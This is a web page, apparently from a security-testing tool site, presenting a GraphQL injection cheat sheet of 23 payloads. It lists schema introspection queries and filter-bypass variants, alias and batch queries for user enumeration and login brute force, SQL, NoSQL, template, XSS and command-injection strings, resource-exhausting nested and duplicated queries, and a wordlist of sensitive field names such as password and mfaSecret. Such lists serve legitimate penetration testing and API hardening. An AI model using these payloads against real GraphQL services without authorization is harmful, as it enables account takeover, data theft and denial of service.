GraphQL Injection Cheat Sheet

GraphQL injection and exploitation payloads for testing GraphQL APIs — introspection, batching, injection, and DoS. (23 payloads)

Introspection Queries

(5)

{"query":"{__schema{types{name fields{name type{name kind ofType{name kind}}}}}}"}

Full schema introspection — list all types and fields

{"query":"{__schema{queryType{name} mutationType{name} subscriptionType{name}}}"}

List root operation types

{"query":"{__schema{types{name kind description}}}"}

List all types with descriptions

{"query":"{__type(name:\"User\"){fields{name type{name} args{name type{name}}}}}"}

Enumerate fields and arguments for a specific type

{"query":"{__schema{directives{name description locations args{name}}}}"}

List all directives

Introspection Bypass

(4)

{"query":"{__sch\\u0065ma{types{name}}}"}

Unicode escape bypass for __schema

GET /graphql?query={__schema{types{name}}}

GET method bypass — some WAFs only filter POST

{"query":"query IntrospectionQuery{__schema{types{name}}}","operationName":"IntrospectionQuery"}

Named operation — may bypass operation name filters

# Try alternative endpoints:
/graphql
/graphiql
/v1/graphql
/api/graphql
/query
/gql

Common GraphQL endpoint paths

Batch & Alias Attacks

(3)

[{"query":"{ me { id } }"},{"query":"{ me { email } }"},{"query":"{ me { role } }"}]

Array batching — bypass rate limiting by sending multiple queries in one request

{"query":"{ a:user(id:1){email} b:user(id:2){email} c:user(id:3){email} d:user(id:4){email} }"}

Alias-based IDOR — enumerate users in a single query

{"query":"{ a:login(u:\"admin\",p:\"pass1\"){token} b:login(u:\"admin\",p:\"pass2\"){token} c:login(u:\"admin\",p:\"pass3\"){token} }"}

Alias-based brute force — multiple login attempts in one request

Injection in Arguments

(5)

{"query":"{ user(id: \"1 OR 1=1--\") { id name email } }"}

SQL injection via GraphQL argument

{"query":"{ search(query: \"{{7*7}}\") { results } }"}

SSTI via GraphQL argument

{"query":"{ user(name: \"admin' OR ''='\") { id } }"}

NoSQL injection via string argument

{"query":"mutation { updateProfile(bio: \"<script>alert(1)</script>\") { id } }"}

Stored XSS via mutation input

{"query":"mutation { createPost(content: \"; ls -la\") { id } }"}

Command injection via mutation argument

Denial of Service

(3)

{"query":"{ a { a { a { a { a { a { a { a { a { a { id } } } } } } } } } } }"}

Deeply nested query — exhaust server resources

{"query":"{ user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } user { id } }"}

Field duplication — 500 repeated fields in one query

{"query":"{ users(first: 999999) { edges { node { posts(first: 999999) { edges { node { comments(first: 999999) { id } } } } } } } }"}

Pagination abuse — request maximum records at every level

Sensitive Field Discovery

(3)

# Common sensitive fields to query:
password, passwordHash, secret, token, apiKey,
ssn, creditCard, dob, internalNote, adminFlag,
role, permissions, isAdmin, isSuperuser, mfaSecret,
resetToken, verificationCode, privateKey

Wordlist for sensitive field enumeration after introspection

{"query":"{ __type(name: \"User\") { fields { name isDeprecated deprecationReason } } }"}

Check for deprecated fields — often contain legacy sensitive data

# Use field suggestion errors:
# Query a non-existent field → error message may suggest valid field names
{"query":"{ user { passwor } }"}

Field suggestion abuse — typo triggers auto-suggest of valid fields

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

GraphQL Injection

Related Cheat Sheets

SQL Injection Cheat Sheet NoSQL Injection Cheat Sheet IDOR Cheat Sheet

$loading...